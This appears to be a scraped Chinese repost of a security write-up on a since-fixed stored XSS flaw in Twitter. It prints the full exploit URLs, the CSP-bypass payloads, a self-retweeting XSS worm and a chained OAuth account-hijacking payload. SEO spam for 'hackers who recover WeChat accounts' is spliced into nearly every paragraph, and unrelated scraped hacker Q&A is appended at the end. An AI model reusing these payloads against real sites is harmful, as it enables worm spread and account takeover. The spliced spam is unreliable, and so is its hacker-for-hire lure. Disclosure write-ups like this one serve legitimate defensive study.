*** 网找黑客暗号-从Twitter的XSS漏洞构造出Twitter XSS Worm
2018年半年度,那时候我发现了一个Twitter的储存型XSS漏洞,该漏洞坐落于Twitter的犄角旮旯之处,一般人难以发现。关键取决于,之后我又发现,这一储存型XSS漏洞能够被进一步构造产生一个平稳的XSS worm!
XSS Worm详细介绍
XSS Worm(XSS蜘蛛)是XSS漏洞运用的最厉害的武器,也就是把帮助找回微信号的 *** 黑客XSS漏洞打导致蜘蛛来开展不断发展感柒,安全性威协轻则为“捉弄”,严重为盗取客户数据信息或偏瘫 *** 技术应用。早有二零零五年的Myspace蜘蛛,十九岁青少年制做的XSS worm在短短的几个小时以内就根据Myspace室内空间感染了一百万客户;也有二零零七年的百度空间蜘蛛,至百度搜索开展屏蔽掉安全防护时,这一XSS worm早已感染了8700好几个博客空间。XSS worm对社交平台和大中型论坛社区不良影响巨大。其他信息请参照 *** 。
直截了当上XSS 帮助找回微信号的 *** 黑客 Worm Payload
XSS Worm Payload
直截了当,一来就上要Twitter XSS 帮助找回微信号的 *** 黑客 worm的漏洞运用URL连接(exploit)吧,稍候大家再详细说明在其中的独到之处。在该XSS漏洞恢复以前,根据Twitter公布下列URL连接便会建立出一个XSS worm来,它能够在twiter圈里从一个帐户中散播到另一个帐户。该漏洞运用URL(exploit)以下:
https://twitter.com/messages/compose?recipient_id=988260476659404801&welcome_message_id=9882745帮助找回微信号的 *** 黑客96427304964&text=< /script>< iframe id=__twttr src=/intent/retweet?tweet_id=1114986988128624640>< /iframe>< script src=//syndication.twimg.com/timeline/profile%帮助找回微信号的 *** 黑客3Fcallback=__twttr/alert;user_id=12>< /script>< script src=//syndication.twimg.com/timeline/profile?callback=__twttr/frames[0].retweet_btn_form.submit;user_id=12>
经urldecode变换以后的URL连接以下:
https://twitter.com/messages/compose?recipient_id=988260476659404801&welcome_message_id=988274596427304964&text=<<x>/script><<x>iframe 帮助找回微信号的 *** 黑客 id=__twttr 帮助找回微信号的 *** 黑客 src=/intent/retweet?tweet_id=1114986988128624640><<x>/iframe><<x>script src=//syndication.twimg.com/timeline/profile?callback=__twttr/alert;user_id=12><<x>/script><<x>script 帮助找回微信号的 *** 黑客 src=//syndication.twimg.com/timeline/profile?callback=__twttr/frames[0].retweet_btn_form.submit;user_id=12>
在Twitter中开启实际效果以下:
很有可能你能好奇心,“怎么可能?,它便是一个简易的URL连接啊!?”,可是,相信它并并不是一个一般的URL连接。它是一个Welcome Message(热烈欢迎信息)的deeplink,且根据Twitter Card开展载入展现(在Twitter中点一下连接载入),以下:
有关知识要点
Welcome Message(热烈欢迎信息):自弹出出的信息,类似关帮助找回微信号的 *** 黑客注他人两微一端后,他人私聊对话框自弹出出的热烈欢迎信息。https://developer.twitter.com/en/docs/direct-messages/welcome-messages/overview
Deeplink:多用以挪动移动智能终端,字面意思“深层连接”,但具体并不是这样,具体用意是,能够根据一个简易的URL连接,开启APP并直接进入该APP中的文章正文页,前提条件是该APP在该手机已安裝帮助找回微信号的 *** 黑客,且该APP必须程序编写适用该deeplink有关的英语的语法界定。例如可拷贝一些 *** 产品及 *** 网店页的deeplink连接,发给别人,他点一下连接后,能够根据手机上中安裝的 *** 网APP直接进入实际的产品页及店面页。
Twitter Card:便是在你的文章上再加上一段编码连接,根据这类 *** 展现出其他信息,类似Pinterest中的rich pin。现阶段Twitter Card适用Summary Card,Summary Card 帮助找回微信号的 *** 黑客 with Large Image,photo card,Gallery Card,APP Card,Player Card,Play Card: approve guide,Product Card 8种 *** 的展现连接。
好啦,那麼我是怎样发现这一XSS Worm的呢?大家从一开始发现的XSS漏洞来说。
发现基本的XSS漏洞
所述的Twittce Card实际上是一个iframe元素,它的展帮助找回微信号的 *** 黑客示偏向连接为 “https://twitter.com/i/cards/tfw/v1/1114991578353930240“ 。该iframe很显著是根据同源策略(same-origin)而不是沙盒游戏,这代表着我们可以根据DOM同源策略浏览同宗网址下的父级网页页面。
在大家一开始构造的漏洞运用URL连接中,把Payload做为主要参数”text”的值,以下:
text=<<x>/script><<x>iframe id=__twttr src=/intent/retweet?tweet_id=1114986988128624640><<x>/iframe><<x>script src=//syndication.twimg.com/timeline/profile?callback=_帮助找回微信号的 *** 黑客_twttr/alert;user_id=12><<x>/script><<x>script src=//syndication.twimg.com/timeline/profile?callback=__twttr/frames[0].retweet_btn_form.submit;user_id=12>
在载入展现漏洞运用URL的Twittce Card中,根据帮助找回微信号的 *** 黑客查询在其中的展现偏向连接网页源码得知,这一”text”主要参数体现在了一个内联 *** ON目标中,并取值给了”default_composer_text“键值。以下:
<script type="text/twitter-cards-serialization"> { 帮助找回微信号的 *** 黑客 "strings":{ }, "card":{ "viewer_id" : "988260476659404801", "is_caps_enabled" : true, "forward" : "false", 帮助找回微信号的 *** 黑客 "is_logged_in" : true, "is_author" : true, "language" : "en", "card_name" : "2586390716:message_me", "welcome_message_id" : 帮助找回微信号的 *** 黑客 "988274596427304964", "token" : "[redacted]", "is_emojify_enabled" : true, "scribe_context" : "{}", "is_static_view" : 帮助找回微信号的 *** 黑客 false, "default_composer_text" : "</script><iframe id=__twttr src=/intent/retweet?tweet_id=1114986988128624640></iframe><script 帮助找回微信号的 *** 黑客 src=//syndication.twimg.com/timeline/profile?callback=__twttr/alert;user_id=12></script><script src=//syndication.twimg.com/timeline/profile?callback=__twttr/frames[0].retweet_btn_form.submit;user_id=12>\\\?", "recipient_id" : &帮助找回微信号的 *** 黑客quot;988260476659404801", "card_uri" : "https://t.co/1vVzoyquhh", "render_card" : true, "tweet_id" : "1114991578353930240", "card_url&帮忙找回微信号的黑客quot; : "https://t.co/1vVzoyquhh"}, "twitter_cldr": false, "scribeData": { "card_name": 帮忙找回微信号的黑客 "2586390716:message_me", "card_url": "https://t.co/1vVzoyquhh"
} }</script>
请注意,HTML解析机制帮忙找回微信号的黑客发现在起始的<script>后任何地方存在</script>闭合标签,无论是在字符串或评论或正则表达式中,那么,这种script脚本范围都会到此终止。
在此之前,基于Twitter的安全防护环境、WAF部署和Web应用过滤规则,我们可能会遇到以下限制或障碍因素:
1、目标系统把单引号和双引号分别转义为 `\’` 和 `\”`;
帮忙找回微信号的黑客2、HTML的某些敏感标签被直接过滤掉,如 `a</script>b` 直接被过滤为了`ab`;
3、或者是Payload长度被限制在300个字符内;
4、存在内容安全策略CSP,通过白名单方式来限制某些内联脚本(Inline Scripts)。
起初来看,这些防护策略看似合理,但当我检查HTML标签的剥离动作时,我隐约觉得有些问题。由于这种剥离(去除)字符串中HTML标签的操帮忙找回微信号的黑客作不像转义单独的字符,它需要用到HTML解析,HTML解析又经常会出错(象正则表达式之类的),所以在此,这种HTML标签剥离操作可以深入研究分析一下。
于是,我立马动手构造了一个非常基本的Payload:`</script><svg onload=alert()>`,之后又构造了这个Payload:`<</<x>/script/test000><</<x>svg 帮忙找回微信号的黑客 onload=alert()></><script>1<\x>2`,这个Payload经Twitter的HTML标签剥离操作后,变成了 `</script/test000><svg onload=alert()>`,啊哦,到了这一步,这个也算是个XSS漏洞了,在未继续深挖找到CSP绕过 *** 前,心急的我就向Twitter安全团队上报了。
Twitter的CSP策略绕过
上报了这个XSS漏洞之后,我又继续研究Twitter的内容安全策略(CSP),这种网站的CSP可以通过抓包和工具检测出来。有意思的是,Twitter并没有在所有应用服务中部署全局CSP策略,也就是说,一些应用服务有着不一样的CSP策略。Twitter站点(https://twitter.com/)的完整CSP策略如下:
而Twitter Cards的CSP又是和以上完整的CSP不一样,我们在此只挑出Twitter Cards CSP中的script-src部分来帮忙找回微信号的黑客看,如下:
script-src 'nonce-ETj41imzIQ/aBrjFcbynCg==' https://twitter.com https:/__twttr/alert({"headers":{"status":200帮忙找回微信号的黑客,"maxPosition":"1113300837160222720","minPosition":"1098761257606307840","xPolling":30,"time":1554668056},"body":"[...]"});
所以现在我们只帮忙找回微信号的黑客需找到一种 *** ,那就是在’window’对象(浏览器打开窗口)上定义`__twttr`引用,这里有两种 *** 来实现:
1、找到一种符合白名单且定义了 `__twttr` 变量的脚本,把它包装到我们的Payload中;
2、将HTML元素的ID属性设置为`__twttr`,这样一来,它就能为’window’对象中的元素创建一个全局引用。
在此,帮忙找回微信号的黑客我选择第2种 *** 。如果做够这些,目前来看,应该没什么大问题。虽然我们不能在回调参数中注入任意字符,也就是说,会在JavaScript语法上受到的限制较多。但请注意,“?callback=__twttr/alert;user_id=12”中的分号并不是回调参数中的一部分,它只是查询分隔符,类似于&。但这并不是问题,我们仍然可以构造来调用一些我们想要的函数,就比如Same Origin Method 帮忙找回微信号的黑客 Execution攻击。
总结来看,我们构造的完整Payload作用如下:
1、创建一个有具备ID属性为__twttr的iframe元素, 这个元素通过Twitter Web Intents链接方式指向一条特定推文,这里我们用 https://twitter.com/intent/retweet?tweet_id=1114986988128624640;
2、绕过CSP策略调用一个同帮忙找回微信号的黑客步 *** 函数,如`alert`,去推迟下一个脚本块的执行,直到上面的iframe元素完全加载执行。当然了,由于语法限制,这个`alert`同步 *** 函数不会具体地显示出来,另外,我们也不能简单地使用`setTimeout(func)`;
3、再次利用CSP策略绕过,通过提交iframe元素中的表单(form),去触发对某条特定推文的转推操作。
构造XSS worm
作为一个 XSS worm 帮忙找回微信号的黑客 来说,能进行自我转发是比较理想的。而且如果没有语法限制,构造XSS worm传播就相对简单。但现在我们只能依靠Twitter Web Intents方式来进行转推,这种方式下,需要在转推操作之前就要明确tweet ID,比较难的就是, tweet IDs并不是连续的,难以预测。所以,这里就卡住了。
但是,我分析了一个,还有另外两种相对容易的 *** 来创建XSS Worm的传播态势:
1、“武器化帮忙找回微信号的黑客”构造一系列推文链,每条推文中都包含对前一条推文的转发Payload,这样,只要你点击或转发到其中的一条推文,都将造成对整个推文链的不断转发操作,导致攻击链中活跃的Twitter账户都会执行这种操作,形成传播感染;
2、在转发推文中加入一些XSS Payload,也会造成更大范围的影响。
当然了,可以把以上两种 *** 进行综合利用来进行传播感染,影响就能无限大了。好在这里,作为测试分析,我们最终帮忙找回微信号的黑客构造的exploit中,当“https://twitter.com/intent/retweet?tweet_id=1114986988128624640”页面被受害者转发后,’frames[0].retweet_btn_form.submit‘ *** 对应的随后操作不是继续转发。
这里,之一次转发这条exploit推文后,它会立马把它的内容展现在你的Twitter主页中,帮忙找回微信号的黑客之后,再次查看这条推文后,它会让你去关注攻击者的Twitter账户。
深入构造利用 - 利用XSS Worm劫持Twitter用户
XSS Worm除了传播感染,恶作剧之外,还有瘫痪 *** 应用或窃取用户信息的可能。所以,在此,我们基于这个XSS Worm,可以在其中加入一些恶意功能,比如可以通过强制Twitter用户对某些第三方恶意应用进行授权,以此隐蔽窃取受害者身份令牌,且能在Twitter的帮忙找回微信号的黑客验证机制“oauth/authorize” 中获得完整账户权限,实现Twitter账户劫持。
为了实现这一点,攻击者可以在某个iframe元素中加载 “https://twitter.com/oauth/authorize?oauth_token=[token]” 链接,自动提交该链接页面中的验证表单(其中包含如 `oauth_form`的ID属性),就能在随后的身份窃取帮忙找回微信号的黑客中起到作用。
最终,基于上述一大堆的传播功能构造,加入这种带有身份窃取功能的隐蔽XSS Worm分阶段运行如下:
1、发送带有下面这个Payload的推文并获取其推文ID:
</script><iframe src=/oauth/authorize?oauth_token=cXDzjwAAAAAA4_EbAAABaizuCOk></iframe>
帮忙找回微信号的黑客2、发送另一条推文并获取其推文ID:
</script><script id=__twttr src=//syndication.twimg.com/tweets.json?callback=__twttr/parent.frames[0].oauth_form.submit;ids=20></script>
3、发送第三条推文作为身份窃取劫持的Payload,这帮忙找回微信号的黑客条推文综合了之一二条推文,并应用到了同一个页面链接中:
</script><iframe src=/i/cards/tfw/v1/1118608452136460288></iframe><iframe src=/i/cards/tfw/v1/1118609496560029696></iframe>
一旦Twitter受害者打开加载第三条推文后帮忙找回微信号的黑客,攻击者控制的第三方恶意应用就能获取受害者的Twitter身份信息,实现账户劫持。要注意的是,”oauth_token”只能被进行一次身份验证,且其有效期非常短。但对一些不懈的攻击者来说,只要发送大量推文,就能劫持到很多用户权限。
最为重要的是,攻击者还可以利用改造XSS Worm,强迫用户在Twitter上加载任意页面,点击任意按钮,提交任意表单等等恶意行为。
漏洞上报进程
2018.4.23 帮忙找回微信号的黑客 绕过过滤措施的XSS漏洞初报
2018.4.25 漏洞分类处理
2018.4.27 Twitter给出$2,940的奖励
2018.5.4 XSS漏洞修复
2019.4.7 我上报帮忙找回微信号的黑客了CSP绕过漏洞
2019.4.12 考虑到XSS Worm的严重性,我直接给Twitter工程师发了write-up专报
2019.4.12 Twitter要求我待修复后再公开漏洞
2019.4.22 Twitter修复了CSP绕过漏洞并同意我进行漏洞公开
2019.5.2 帮忙找回微信号的黑客 帮忙找回微信号的黑客我对漏洞进行了公开
*参考来源:virtuesecurity,clouds编译,转载请注明来自FreeBuf.COM
编写软件,研究漏洞的人才是黑客只会操作软件,利用漏洞的叫骇客当然,在入侵的时候使用工具会更简单些有的时候入侵时必须使用工具的你也许知道许多常见的攻击 *** ,下面列出了一些:1、字典攻击:黑客利用一些自动执行的程序猜测用户命和密码,审帮忙找回微信号的黑客计这类攻击通常需要做全面的日志记录和入侵监测。 *** 找黑客暗语
通过手机号入侵手机但到了今天,原指热心于计算机技术,水平高超的电脑专家,而骇客们破坏,黑客一词已被用于泛指那些专门利用电脑搞破坏或恶作剧的家伙,黑客一词往往指那些“。
微信显示"您的账号已退出,请重新登录"可是却还能正常运行是不是有黑客侵入求解急这种情况下可以通过什么保护。求解急这种情况下可以通过什么保。
你好。网吧里面如果没有安装杀毒帮忙找回微信号的黑客 软件的话,一般都有黑客的木马。木马程序会自动记录一些帐号信息。所以建议你千万不要在聊天或者网站上输入你自己的银行帐号。
。黑客攻击正常,没攻破是值得炫耀的事,有啥不敢说的。你自己想歪了。哈哈哈哈我们是一家电子商务的网站,昨天遭到黑客攻击,到现在技术也没有解决问题,公司损失惨重,有没有什么好的解决 *** ,黑客还跟公司要钱,老板不肯给,但是问题。用手机怎么当黑客
实话实说,如果真的想做一个称职的、高水平的HACKER的话,那么他必须要精通如下计算机技术:计算机汇编语言、C语言、Python语言,计算机操作系统原理及其。
*** 找黑客暗语。你以后都不要在电脑和 *** 上留任何东西了,但是你又可以偷看别人的几乎没有什么隐私!如果没有什么见不得人的秘密,还是可以做男朋友的!你也可以通过黑客武林,多去了解一些关于黑客这方面的技术。
标签:
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。